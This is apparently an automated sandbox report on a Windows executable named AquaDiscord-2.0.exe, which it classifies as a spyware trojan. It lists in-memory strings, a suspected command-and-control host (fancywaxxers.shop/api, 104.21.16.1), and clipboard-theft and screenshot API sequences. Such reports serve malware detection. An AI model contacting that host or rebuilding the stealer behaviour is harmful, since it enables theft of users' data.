                Source: AquaDiscord-2.0.exe, 00000002.00000003.1693667691.000000000543D000.00000004.00000800.00020000.00000000.sdmp, AquaDiscord-2.0.exe, 00000002.00000003.1693765440.000000000543A000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://ac.ecosia.org/autocomplete?q=
                Source: AquaDiscord-2.0.exe, 00000002.00000003.1723179894.00000000053FF000.00000004.00000800.00020000.00000000.sdmp, AquaDiscord-2.0.exe, 00000002.00000003.1723197231.0000000005404000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://bridge.lga1.admarketplace.net/ctp?version=16.0.0&key=1696332238301000001.2&ci=1696332238417.
                Source: AquaDiscord-2.0.exe, 00000002.00000003.1723179894.00000000053FF000.00000004.00000800.00020000.00000000.sdmp, AquaDiscord-2.0.exe, 00000002.00000003.1723197231.0000000005404000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://bridge.lga1.ap01.net/ctp?version=16.0.0&key=1696332238301000001.1&ci=1696332238417.12791&cta
                Source: AquaDiscord-2.0.exe, 00000002.00000003.1693667691.000000000543D000.00000004.00000800.00020000.00000000.sdmp, AquaDiscord-2.0.exe, 00000002.00000003.1693765440.000000000543A000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://cdn.ecosia.org/assets/images/ico/favicon.icohttps://www.ecosia.org/search?q=
                Source: AquaDiscord-2.0.exe, 00000002.00000003.1693667691.000000000543D000.00000004.00000800.00020000.00000000.sdmp, AquaDiscord-2.0.exe, 00000002.00000003.1693765440.000000000543A000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://ch.search.yahoo.com/favicon.icohttps://ch.search.yahoo.com/search
                Source: AquaDiscord-2.0.exe, 00000002.00000003.1693667691.000000000543D000.00000004.00000800.00020000.00000000.sdmp, AquaDiscord-2.0.exe, 00000002.00000003.1693765440.000000000543A000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://ch.search.yahoo.com/sugg/chrome?output=fxjson&appid=crmas&command=
                Source: AquaDiscord-2.0.exe, 00000002.00000003.1723179894.00000000053FF000.00000004.00000800.00020000.00000000.sdmp, AquaDiscord-2.0.exe, 00000002.00000003.1723197231.0000000005404000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://contile-images.services.mozilla.com/0TegrVVRalreHILhR2WvtD_CFzj13HCDcLqqpvXSOuY.10862.jpg
                Source: AquaDiscord-2.0.exe, 00000002.00000003.1723179894.00000000053FF000.00000004.00000800.00020000.00000000.sdmp, AquaDiscord-2.0.exe, 00000002.00000003.1723197231.0000000005404000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://contile-images.services.mozilla.com/obgoOYObjIFea_bXuT6L4LbBJ8j425AD87S1HMD3BWg.9991.jpg
                Source: AquaDiscord-2.0.exe, 00000002.00000003.1693667691.000000000543D000.00000004.00000800.00020000.00000000.sdmp, AquaDiscord-2.0.exe, 00000002.00000003.1693765440.000000000543A000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://duckduckgo.com/ac/?q=
                Source: AquaDiscord-2.0.exe, 00000002.00000003.1693667691.000000000543D000.00000004.00000800.00020000.00000000.sdmp, AquaDiscord-2.0.exe, 00000002.00000003.1693765440.000000000543A000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://duckduckgo.com/chrome_newtab
                Source: AquaDiscord-2.0.exe, 00000002.00000003.1693667691.000000000543D000.00000004.00000800.00020000.00000000.sdmp, AquaDiscord-2.0.exe, 00000002.00000003.1693765440.000000000543A000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://duckduckgo.com/favicon.icohttps://duckduckgo.com/?q=
                Source: AquaDiscord-2.0.exe, 00000002.00000003.1692630755.0000000002DED000.00000004.00000020.00020000.00000000.sdmp, AquaDiscord-2.0.exe, 00000002.00000002.2910034398.0000000002E5F000.00000004.00000020.00020000.00000000.sdmp, AquaDiscord-2.0.exe, 00000002.00000003.1737979972.0000000002DED000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://fancywaxxers.shop/
                Source: AquaDiscord-2.0.exe, 00000002.00000003.2402019988.0000000002E56000.00000004.00000020.00020000.00000000.sdmp, AquaDiscord-2.0.exe, 00000002.00000003.1751206629.0000000002E63000.00000004.00000020.00020000.00000000.sdmp, AquaDiscord-2.0.exe, 00000002.00000003.1750932268.0000000002E63000.00000004.00000020.00020000.00000000.sdmp, AquaDiscord-2.0.exe, 00000002.00000003.1747045883.0000000002E63000.00000004.00000020.00020000.00000000.sdmp, AquaDiscord-2.0.exe, 00000002.00000003.1747284346.0000000002E63000.00000004.00000020.00020000.00000000.sdmp, AquaDiscord-2.0.exe, 00000002.00000003.2401772119.0000000002E4F000.00000004.00000020.00020000.00000000.sdmp, AquaDiscord-2.0.exe, 00000002.00000003.2402077657.0000000002E5E000.00000004.00000020.00020000.00000000.sdmp, AquaDiscord-2.0.exe, 00000002.00000002.2910034398.0000000002E5F000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://fancywaxxers.shop/$
                Source: AquaDiscord-2.0.exe, 00000002.00000003.1737668890.0000000002E63000.00000004.00000020.00020000.00000000.sdmp, AquaDiscord-2.0.exe, 00000002.00000003.1737933383.0000000002E63000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://fancywaxxers.shop/L
                Source: AquaDiscord-2.0.exe, 00000002.00000003.1692630755.0000000002DED000.00000004.00000020.00020000.00000000.sdmp, AquaDiscord-2.0.exe, 00000002.00000002.2910034398.0000000002E5F000.00000004.00000020.00020000.00000000.sdmp, AquaDiscord-2.0.exe, 00000002.00000003.1737979972.0000000002DED000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://fancywaxxers.shop/api
                Source: AquaDiscord-2.0.exe, 00000002.00000002.2910002831.0000000002E54000.00000004.00000020.00020000.00000000.sdmp, AquaDiscord-2.0.exe, 00000002.00000003.2401772119.0000000002E4F000.00000004.00000020.00020000.00000000.sdmp, AquaDiscord-2.0.exe, 00000002.00000003.2402042694.0000000002E52000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://fancywaxxers.shop/apif
                Source: AquaDiscord-2.0.exe, 00000002.00000003.1747045883.0000000002E63000.00000004.00000020.00020000.00000000.sdmp, AquaDiscord-2.0.exe, 00000002.00000003.1747284346.0000000002E63000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://fancywaxxers.shop/apik
                Source: AquaDiscord-2.0.exe, 00000002.00000003.1692630755.0000000002DED000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://fancywaxxers.shop/api~J
                Source: AquaDiscord-2.0.exe, 00000002.00000003.1737584566.0000000002DD3000.00000004.00000020.00020000.00000000.sdmp, AquaDiscord-2.0.exe, 00000002.00000002.2909842558.0000000002DD6000.00000004.00000020.00020000.00000000.sdmp, AquaDiscord-2.0.exe, 00000002.00000003.1747187894.0000000002DD3000.00000004.00000020.00020000.00000000.sdmp, AquaDiscord-2.0.exe, 00000002.00000003.1791621621.0000000002DD3000.00000004.00000020.00020000.00000000.sdmp, AquaDiscord-2.0.exe, 00000002.00000003.2401885385.0000000002DD4000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://fancywaxxers.shop:443/api
                Source: AquaDiscord-2.0.exe, 00000002.00000002.2909842558.0000000002DD6000.00000004.00000020.00020000.00000000.sdmp, AquaDiscord-2.0.exe, 00000002.00000003.2401885385.0000000002DD4000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://fancywaxxers.shop:443/api7
                Source: AquaDiscord-2.0.exe, 00000002.00000003.1692630755.0000000002DD3000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://fancywaxxers.shop:443/api?
                Source: AquaDiscord-2.0.exe, 00000002.00000003.1737584566.0000000002DD3000.00000004.00000020.00020000.00000000.sdmp, AquaDiscord-2.0.exe, 00000002.00000002.2909842558.0000000002DD6000.00000004.00000020.00020000.00000000.sdmp, AquaDiscord-2.0.exe, 00000002.00000003.1747187894.0000000002DD3000.00000004.00000020.00020000.00000000.sdmp, AquaDiscord-2.0.exe, 00000002.00000003.1791621621.0000000002DD3000.00000004.00000020.00020000.00000000.sdmp, AquaDiscord-2.0.exe, 00000002.00000003.1692630755.0000000002DD3000.00000004.00000020.00020000.00000000.sdmp, AquaDiscord-2.0.exe, 00000002.00000003.2401885385.0000000002DD4000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://fancywaxxers.shop:443/apiR
                Source: AquaDiscord-2.0.exe, 00000002.00000002.2909842558.0000000002DD6000.00000004.00000020.00020000.00000000.sdmp, AquaDiscord-2.0.exe, 00000002.00000003.1747187894.0000000002DD3000.00000004.00000020.00020000.00000000.sdmp, AquaDiscord-2.0.exe, 00000002.00000003.1791621621.0000000002DD3000.00000004.00000020.00020000.00000000.sdmp, AquaDiscord-2.0.exe, 00000002.00000003.2401885385.0000000002DD4000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://fancywaxxers.shop:443/apitxtPK
                Source: AquaDiscord-2.0.exe, 00000002.00000002.2909842558.0000000002DD6000.00000004.00000020.00020000.00000000.sdmp, AquaDiscord-2.0.exe, 00000002.00000003.1791621621.0000000002DD3000.00000004.00000020.00020000.00000000.sdmp, AquaDiscord-2.0.exe, 00000002.00000003.2401885385.0000000002DD4000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://fancywaxxers.shop:443/apiu
                Source: AquaDiscord-2.0.exe, 00000002.00000003.1723197231.0000000005404000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://imp.mt48.net/static?id=7RHzfOIXjFEYsBdvIpkX4QqmfZfYfQfafZbXfpbWfpbX7ReNxR3UIG8zInwYIFIVs9eYi
                Source: AquaDiscord-2.0.exe, 00000002.00000003.1694093363.0000000005450000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://support.microsof
                Source: AquaDiscord-2.0.exe, 00000002.00000003.1722843066.000000000551A000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://support.mozilla.org/kb/customize-firefox-controls-buttons-and-toolbars?utm_source=firefox-br
                Source: AquaDiscord-2.0.exe, 00000002.00000003.1722843066.000000000551A000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://support.mozilla.org/products/firefoxgro.all
                Source: AquaDiscord-2.0.exe, 00000002.00000003.1709004731.0000000005449000.00000004.00000800.00020000.00000000.sdmp, AquaDiscord-2.0.exe, 00000002.00000003.1694093363.0000000005450000.00000004.00000800.00020000.00000000.sdmp, AquaDiscord-2.0.exe, 00000002.00000003.1709186168.0000000005449000.00000004.00000800.00020000.00000000.sdmp, AquaDiscord-2.0.exe, 00000002.00000003.1694160465.0000000005449000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://support.office.com/article/7D48285B-20E8-4B9B-91AD-216E34163BAD?wt.mc_id=EnterPK2016
                Source: AquaDiscord-2.0.exe, 00000002.00000003.1694160465.0000000005424000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://support.office.com/article/7D48285B-20E8-4B9B-91AD-216E34163BAD?wt.mc_id=EnterPK2016Examples
                Source: AquaDiscord-2.0.exe, 00000002.00000003.1709004731.0000000005449000.00000004.00000800.00020000.00000000.sdmp, AquaDiscord-2.0.exe, 00000002.00000003.1694093363.0000000005450000.00000004.00000800.00020000.00000000.sdmp, AquaDiscord-2.0.exe, 00000002.00000003.1709186168.0000000005449000.00000004.00000800.00020000.00000000.sdmp, AquaDiscord-2.0.exe, 00000002.00000003.1694160465.0000000005449000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://support.office.com/article/94ba2e0b-638e-4a92-8857-2cb5ac1d8e17
                Source: AquaDiscord-2.0.exe, 00000002.00000003.1694160465.0000000005424000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://support.office.com/article/94ba2e0b-638e-4a92-8857-2cb5ac1d8e17Install
                Source: AquaDiscord-2.0.exe, 00000002.00000003.1723179894.00000000053FF000.00000004.00000800.00020000.00000000.sdmp, AquaDiscord-2.0.exe, 00000002.00000003.1723197231.0000000005404000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.amazon.com/?tag=admarketus-20&ref=pd_sl_7548d4575af019e4c148ccf1a78112802e66a0816a72fc94
                Source: AquaDiscord-2.0.exe, 00000002.00000003.1693667691.000000000543D000.00000004.00000800.00020000.00000000.sdmp, AquaDiscord-2.0.exe, 00000002.00000003.1693765440.000000000543A000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.ecosia.org/newtab/
                Source: AquaDiscord-2.0.exe, 00000002.00000003.1723179894.00000000053FF000.00000004.00000800.00020000.00000000.sdmp, AquaDiscord-2.0.exe, 00000002.00000003.1723197231.0000000005404000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.expedia.com/?locale=en_US&siteid=1&semcid=US.UB.ADMARKETPLACE.GT-C-EN.HOTEL&SEMDTL=a1219
                Source: AquaDiscord-2.0.exe, 00000002.00000003.1693667691.000000000543D000.00000004.00000800.00020000.00000000.sdmp, AquaDiscord-2.0.exe, 00000002.00000003.1693765440.000000000543A000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.google.com/images/branding/product/ico/googleg_lodp.ico
                Source: AquaDiscord-2.0.exe, 00000002.00000003.1722843066.000000000551A000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.mozilla.org/about/gro.allizom.www.VsJpOAWrHqB2
                Source: AquaDiscord-2.0.exe, 00000002.00000003.1722843066.000000000551A000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.mozilla.org/contribute/gro.allizom.www.n0g9CLHwD9nR
                Source: AquaDiscord-2.0.exe, 00000002.00000003.1722843066.000000000551A000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.mozilla.org/en-US/privacy/firefox/Firefox
                Source: AquaDiscord-2.0.exe, 00000002.00000003.1722843066.000000000551A000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.mozilla.org/firefox/?utm_medium=firefox-desktop&utm_source=bookmarks-toolbar&utm_campaig
                Source: AquaDiscord-2.0.exe, 00000002.00000003.1722843066.000000000551A000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.mozilla.org/privacy/firefox/gro.allizom.www.
                Source: unknownNetwork traffic detected: HTTP traffic on port 49733 -> 443
                Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49733
                Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49732
                Source: unknownNetwork traffic detected: HTTP traffic on port 49734 -> 443
                Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49731
                Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49730
                Source: unknownNetwork traffic detected: HTTP traffic on port 49731 -> 443
                Source: unknownNetwork traffic detected: HTTP traffic on port 49732 -> 443
                Source: unknownNetwork traffic detected: HTTP traffic on port 49730 -> 443
                Source: unknownNetwork traffic detected: HTTP traffic on port 49736 -> 443
                Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49737
                Source: unknownNetwork traffic detected: HTTP traffic on port 49735 -> 443
                Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49736
                Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49735
                Source: unknownNetwork traffic detected: HTTP traffic on port 49737 -> 443
                Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49734
                Source: unknownHTTPS traffic detected: 104.21.16.1:443 -> 192.168.2.4:49730 version: TLS 1.2
                Source: unknownHTTPS traffic detected: 104.21.16.1:443 -> 192.168.2.4:49731 version: TLS 1.2
                Source: unknownHTTPS traffic detected: 104.21.16.1:443 -> 192.168.2.4:49732 version: TLS 1.2
                Source: unknownHTTPS traffic detected: 104.21.16.1:443 -> 192.168.2.4:49733 version: TLS 1.2
                Source: unknownHTTPS traffic detected: 104.21.16.1:443 -> 192.168.2.4:49734 version: TLS 1.2
                Source: unknownHTTPS traffic detected: 104.21.16.1:443 -> 192.168.2.4:49735 version: TLS 1.2
                Source: unknownHTTPS traffic detected: 104.21.16.1:443 -> 192.168.2.4:49736 version: TLS 1.2
                Source: unknownHTTPS traffic detected: 104.21.16.1:443 -> 192.168.2.4:49737 version: TLS 1.2
                Source: C:\Users\user\Desktop\AquaDiscord-2.0.exeCode function: 2_2_00434280 OpenClipboard,GetClipboardData,GlobalLock,GetWindowLongW,GlobalUnlock,CloseClipboard,2_2_00434280
                Source: C:\Users\user\Desktop\AquaDiscord-2.0.exeCode function: 2_2_05141000 EntryPoint,GetClipboardSequenceNumber,Sleep,Sleep,OpenClipboard,GetClipboardData,GlobalLock,GlobalAlloc,GlobalLock,GlobalUnlock,EmptyClipboard,SetClipboardData,GlobalFree,GlobalUnlock,CloseClipboard,GetClipboardSequenceNumber,2_2_05141000
                Source: C:\Users\user\Desktop\AquaDiscord-2.0.exeCode function: 2_2_00434280 OpenClipboard,GetClipboardData,GlobalLock,GetWindowLongW,GlobalUnlock,CloseClipboard,2_2_00434280
                Source: C:\Users\user\Desktop\AquaDiscord-2.0.exeCode function: 2_2_00434460 GetDC,GetSystemMetrics,GetSystemMetrics,GetSystemMetrics,GetCurrentObject,GetObjectW,DeleteObject,CreateCompatibleDC,CreateCompatibleBitmap,SelectObject,BitBlt,2_2_00434460
                Source: C:\Users\user\Desktop\AquaDiscord-2.0.exeCode function: 0_2_00B0EA4E0_2_00B0EA4E
                Source: C:\Users\user\Desktop\AquaDiscord-2.0.exeCode function: 0_2_00B104C20_2_00B104C2
                Source: C:\Users\user\Desktop\AquaDiscord-2.0.exeCode function: 0_2_00B034000_2_00B03400
                Source: C:\Users\user\Desktop\AquaDiscord-2.0.exeCode function: 0_2_00AFDDA20_2_00AFDDA2
                Source: C:\Users\user\Desktop\AquaDiscord-2.0.exeCode function: 0_2_00AF969B0_2_00AF969B
                Source: C:\Users\user\Desktop\AquaDiscord-2.0.exeCode function: 2_2_0043D0502_2_0043D050
                Source: C:\Users\user\Desktop\AquaDiscord-2.0.exeCode function: 2_2_0042207D2_2_0042207D
                Source: C:\Users\user\Desktop\AquaDiscord-2.0.exeCode function: 2_2_004398002_2_00439800
                Source: C:\Users\user\Desktop\AquaDiscord-2.0.exeCode function: 2_2_004419002_2_00441900
                Source: C:\Users\user\Desktop\AquaDiscord-2.0.exeCode function: 2_2_004119202_2_00411920
                Source: C:\Users\user\Desktop\AquaDiscord-2.0.exeCode function: 2_2_0042DA212_2_0042DA21
                Source: C:\Users\user\Desktop\AquaDiscord-2.0.exeCode function: 2_2_00414A9A2_2_00414A9A
                Source: C:\Users\user\Desktop\AquaDiscord-2.0.exeCode function: 2_2_00439B302_2_00439B30
                Source: C:\Users\user\Desktop\AquaDiscord-2.0.exeCode function: 2_2_00426B802_2_00426B80
                Source: C:\Users\user\Desktop\AquaDiscord-2.0.exeCode function: 2_2_00420DD02_2_00420DD0
                Source: C:\Users\user\Desktop\AquaDiscord-2.0.exeCode function: 2_2_0040CEC72_2_0040CEC7
                Source: C:\Users\user\Desktop\AquaDiscord-2.0.exeCode function: 2_2_00422F702_2_00422F70
                Source: C:\Users\user\Desktop\AquaDiscord-2.0.exeCode function: 2_2_0043F73E2_2_0043F73E
                Source: C:\Users\user\Desktop\AquaDiscord-2.0.exeCode function: 2_2_00440FD02_2_00440FD0
                Source: C:\Users\user\Desktop\AquaDiscord-2.0.exeCode function: 2_2_0040FFD62_2_0040FFD6
                Source: C:\Users\user\Desktop\AquaDiscord-2.0.exeCode function: 2_2_004087B02_2_004087B0
                Source: C:\Users\user\Desktop\AquaDiscord-2.0.exeCode function: 2_2_004270502_2_00427050
                Source: C:\Users\user\Desktop\AquaDiscord-2.0.exeCode function: 2_2_004400652_2_00440065
                Source: C:\Users\user\Desktop\AquaDiscord-2.0.exeCode function: 2_2_004340602_2_00434060
                Source: C:\Users\user\Desktop\AquaDiscord-2.0.exeCode function: 2_2_004278792_2_00427879
                Source: C:\Users\user\Desktop\AquaDiscord-2.0.exeCode function: 2_2_004188162_2_00418816
                Source: C:\Users\user\Desktop\AquaDiscord-2.0.exeCode function: 2_2_0041D0202_2_0041D020
                Source: C:\Users\user\Desktop\AquaDiscord-2.0.exeCode function: 2_2_004228302_2_00422830
                Source: C:\Users\user\Desktop\AquaDiscord-2.0.exeCode function: 2_2_0040C8E52_2_0040C8E5
                Source: C:\Users\user\Desktop\AquaDiscord-2.0.exeCode function: 2_2_004408802_2_00440880
                Source: C:\Users\user\Desktop\AquaDiscord-2.0.exeCode function: 2_2_0040A8B02_2_0040A8B0
                Source: C:\Users\user\Desktop\AquaDiscord-2.0.exeCode function: 2_2_004059102_2_00405910
                Source: C:\Users\user\Desktop\AquaDiscord-2.0.exeCode function: 2_2_004169142_2_00416914
                Source: C:\Users\user\Desktop\AquaDiscord-2.0.exeCode function: 2_2_004039202_2_00403920
                Source: C:\Users\user\Desktop\AquaDiscord-2.0.exeCode function: 2_2_0041D9202_2_0041D920
                Source: C:\Users\user\Desktop\AquaDiscord-2.0.exeCode function: 2_2_004409202_2_00440920
                Source: C:\Users\user\Desktop\AquaDiscord-2.0.exeCode function: 2_2_0040B1322_2_0040B132
                Source: C:\Users\user\Desktop\AquaDiscord-2.0.exeCode function: 2_2_004201302_2_00420130
                Source: C:\Users\user\Desktop\AquaDiscord-2.0.exeCode function: 2_2_004191C02_2_004191C0
                Source: C:\Users\user\Desktop\AquaDiscord-2.0.exeCode function: 2_2_004359C52_2_004359C5
                Source: C:\Users\user\Desktop\AquaDiscord-2.0.exeCode function: 2_2_004371FD2_2_004371FD
                Source: C:\Users\user\Desktop\AquaDiscord-2.0.exeCode function: 2_2_004219802_2_00421980
                Source: C:\Users\user\Desktop\AquaDiscord-2.0.exeCode function: 2_2_0043D9A02_2_0043D9A0
                Source: C:\Users\user\Desktop\AquaDiscord-2.0.exeCode function: 2_2_004381AC2_2_004381AC
                Source: C:\Users\user\Desktop\AquaDiscord-2.0.exeCode function: 2_2_004409B02_2_004409B0
                Source: C:\Users\user\Desktop\AquaDiscord-2.0.exeCode function: 2_2_00438A552_2_00438A55
                Source: C:\Users\user\Desktop\AquaDiscord-2.0.exeCode function: 2_2_00427A6E2_2_00427A6E
                Source: C:\Users\user\Desktop\AquaDiscord-2.0.exeCode function: 2_2_0040F27E2_2_0040F27E
                Source: C:\Users\user\Desktop\AquaDiscord-2.0.exeCode function: 2_2_004062002_2_00406200
                Source: C:\Users\user\Desktop\AquaDiscord-2.0.exeCode function: 2_2_00415A052_2_00415A05
                Source: C:\Users\user\Desktop\AquaDiscord-2.0.exeCode function: 2_2_00418A302_2_00418A30
                Source: C:\Users\user\Desktop\AquaDiscord-2.0.exeCode function: 2_2_004392302_2_00439230
                Source: C:\Users\user\Desktop\AquaDiscord-2.0.exeCode function: 2_2_00415A052_2_00415A05
                Source: C:\Users\user\Desktop\AquaDiscord-2.0.exeCode function: 2_2_004042D02_2_004042D0
                Source: C:\Users\user\Desktop\AquaDiscord-2.0.exeCode function: 2_2_004162D22_2_004162D2
                Source: C:\Users\user\Desktop\AquaDiscord-2.0.exeCode function: 2_2_00423AE02_2_00423AE0
                Source: C:\Users\user\Desktop\AquaDiscord-2.0.exeCode function: 2_2_00429AFE2_2_00429AFE
                Source: C:\Users\user\Desktop\AquaDiscord-2.0.exeCode function: 2_2_0041AA812_2_0041AA81
                Source: C:\Users\user\Desktop\AquaDiscord-2.0.exeCode function: 2_2_004262A02_2_004262A0
                Source: C:\Users\user\Desktop\AquaDiscord-2.0.exeCode function: 2_2_00437AA02_2_00437AA0
                Source: C:\Users\user\Desktop\AquaDiscord-2.0.exeCode function: 2_2_004092B02_2_004092B0
                Source: C:\Users\user\Desktop\AquaDiscord-2.0.exeCode function: 2_2_004412B02_2_004412B0
                Source: C:\Users\user\Desktop\AquaDiscord-2.0.exeCode function: 2_2_0041EB502_2_0041EB50
                Source: C:\Users\user\Desktop\AquaDiscord-2.0.exeCode function: 2_2_00402B702_2_00402B70
                Source: C:\Users\user\Desktop\AquaDiscord-2.0.exeCode function: 2_2_0040A3122_2_0040A312
                Source: C:\Users\user\Desktop\AquaDiscord-2.0.exeCode function: 2_2_004183FA2_2_004183FA
                Source: C:\Users\user\Desktop\AquaDiscord-2.0.exeCode function: 2_2_0041A3B02_2_0041A3B0
                Source: C:\Users\user\Desktop\AquaDiscord-2.0.exeCode function: 2_2_00430C5A2_2_00430C5A
                Source: C:\Users\user\Desktop\AquaDiscord-2.0.exeCode function: 2_2_004074702_2_00407470
                Source: C:\Users\user\Desktop\AquaDiscord-2.0.exeCode function: 2_2_00423C702_2_00423C70
                Source: C:\Users\user\Desktop\AquaDiscord-2.0.exeCode function: 2_2_0043AC702_2_0043AC70
                Source: C:\Users\user\Desktop\AquaDiscord-2.0.exeCode function: 2_2_00410C792_2_00410C79
                Source: C:\Users\user\Desktop\AquaDiscord-2.0.exeCode function: 2_2_00404C102_2_00404C10
                Source: C:\Users\user\Desktop\AquaDiscord-2.0.exeCode function: 2_2_0041D4302_2_0041D430
                Source: C:\Users\user\Desktop\AquaDiscord-2.0.exeCode function: 2_2_004114CB2_2_004114CB
                Source: C:\Users\user\Desktop\AquaDiscord-2.0.exeCode function: 2_2_004354B72_2_004354B7
                Source: C:\Users\user\Desktop\AquaDiscord-2.0.exeCode function: 2_2_0041CD402_2_0041CD40
                Source: C:\Users\user\Desktop\AquaDiscord-2.0.exeCode function: 2_2_0043ED4D2_2_0043ED4D
                Source: C:\Users\user\Desktop\AquaDiscord-2.0.exeCode function: 2_2_00413D502_2_00413D50
                Source: C:\Users\user\Desktop\AquaDiscord-2.0.exeCode function: 2_2_004415C02_2_004415C0
                Source: C:\Users\user\Desktop\AquaDiscord-2.0.exeCode function: 2_2_0041BDD02_2_0041BDD0
                Source: C:\Users\user\Desktop\AquaDiscord-2.0.exeCode function: 2_2_00429DF02_2_00429DF0
                Source: C:\Users\user\Desktop\AquaDiscord-2.0.exeCode function: 2_2_0043059D2_2_0043059D
                Source: C:\Users\user\Desktop\AquaDiscord-2.0.exeCode function: 2_2_0043AE472_2_0043AE47
                Source: C:\Users\user\Desktop\AquaDiscord-2.0.exeCode function: 2_2_00423E622_2_00423E62
                Source: C:\Users\user\Desktop\AquaDiscord-2.0.exeCode function: 2_2_0043A6602_2_0043A660
                Source: C:\Users\user\Desktop\AquaDiscord-2.0.exeCode function: 2_2_00416E622_2_00416E62
                Source: C:\Users\user\Desktop\AquaDiscord-2.0.exeCode function: 2_2_00418E1C2_2_00418E1C
                Source: C:\Users\user\Desktop\AquaDiscord-2.0.exeCode function: 2_2_0042D6D62_2_0042D6D6
                Source: C:\Users\user\Desktop\AquaDiscord-2.0.exeCode function: 2_2_004406802_2_00440680
                Source: C:\Users\user\Desktop\AquaDiscord-2.0.exeCode function: 2_2_004066902_2_00406690
                Source: C:\Users\user\Desktop\AquaDiscord-2.0.exeCode function: 2_2_0041A6902_2_0041A690
                Source: C:\Users\user\Desktop\AquaDiscord-2.0.exeCode function: 2_2_004096B02_2_004096B0
                Source: C:\Users\user\Desktop\AquaDiscord-2.0.exeCode function: 2_2_004407702_2_00440770
                Source: C:\Users\user\Desktop\AquaDiscord-2.0.exeCode function: 2_2_0043E7762_2_0043E776
                Source: C:\Users\user\Desktop\AquaDiscord-2.0.exeCode function: 2_2_00402F102_2_00402F10
                Source: C:\Users\user\Desktop\AquaDiscord-2.0.exeCode function: 2_2_004397102_2_00439710
                Source: C:\Users\user\Desktop\AquaDiscord-2.0.exeCode function: 2_2_004237C02_2_004237C0
                Source: C:\Users\user\Desktop\AquaDiscord-2.0.exeCode function: 2_2_00438FD02_2_00438FD0
                Source: C:\Users\user\Desktop\AquaDiscord-2.0.exeCode function: 2_2_004407882_2_00440788
                Source: C:\Users\user\Desktop\AquaDiscord-2.0.exeCode function: 2_2_0044078A2_2_0044078A
                Source: C:\Users\user\Desktop\AquaDiscord-2.0.exeCode function: 2_2_0042BFB42_2_0042BFB4
                Source: C:\Users\user\Desktop\AquaDiscord-2.0.exeCode function: 2_2_00417FBC2_2_00417FBC
                Source: C:\Users\user\Desktop\AquaDiscord-2.0.exeCode function: 2_2_00B0EA4E2_2_00B0EA4E
                Source: C:\Users\user\Desktop\AquaDiscord-2.0.exeCode function: 2_2_00B104C22_2_00B104C2
                Source: C:\Users\user\Desktop\AquaDiscord-2.0.exeCode function: 2_2_00B034002_2_00B03400
                Source: C:\Users\user\Desktop\AquaDiscord-2.0.exeCode function: 2_2_00AFDDA22_2_00AFDDA2
                Source: C:\Users\user\Desktop\AquaDiscord-2.0.exeCode function: 2_2_00AF969B2_2_00AF969B
                Source: C:\Users\user\Desktop\AquaDiscord-2.0.exeCode function: String function: 00413D40 appears 72 times
                Source: C:\Users\user\Desktop\AquaDiscord-2.0.exeCode function: String function: 00B066CD appears 34 times
                Source: C:\Users\user\Desktop\AquaDiscord-2.0.exeCode function: String function: 00407FD0 appears 51 times
                Source: C:\Users\user\Desktop\AquaDiscord-2.0.exeCode function: String function: 00B01CE8 appears 42 times
                Source: C:\Users\user\Desktop\AquaDiscord-2.0.exeCode function: String function: 00AF9BB0 appears 94 times
                Source: AquaDiscord-2.0.exeStatic PE information: EXECUTABLE_IMAGE, 32BIT_MACHINE
                Source: AquaDiscord-2.0.exeStatic PE information: Section: .BSS ZLIB complexity 1.000337734502447
                Source: AquaDiscord-2.0.exeStatic PE information: Section: .BSS ZLIB complexity 1.000337734502447
                Source: classification engineClassification label: mal100.troj.spyw.evad.winEXE@4/0@1/1
